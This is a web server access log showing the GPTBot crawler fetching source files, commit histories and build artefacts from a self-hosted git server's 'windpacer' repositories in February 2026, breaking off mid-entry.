"/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" +[17/Feb/2026:16:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11516] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" +[17/Feb/2026:16:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11981] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" +[17/Feb/2026:16:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?state=open" [Client 74.7.227.38] [Length 8473] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?state=closed" +[17/Feb/2026:16:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14062] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14064] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12806] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" +[17/Feb/2026:16:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" +[17/Feb/2026:16:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:16:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11364] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" +[17/Feb/2026:16:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/index.html" [Client 74.7.227.38] [Length 9772] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" +[17/Feb/2026:16:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11668] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" +[17/Feb/2026:16:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14710] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14712] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14711] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14683] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10050] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" +[17/Feb/2026:16:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" +[17/Feb/2026:16:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10051] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" +[17/Feb/2026:16:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10026] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" +[17/Feb/2026:16:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" +[17/Feb/2026:16:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:16:52:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:16:52:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:16:52:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16419] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:16:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13497] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:16:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 11218] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 12585] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9952] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10113] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10120] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10114] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:16:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10120] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:16:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:16:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 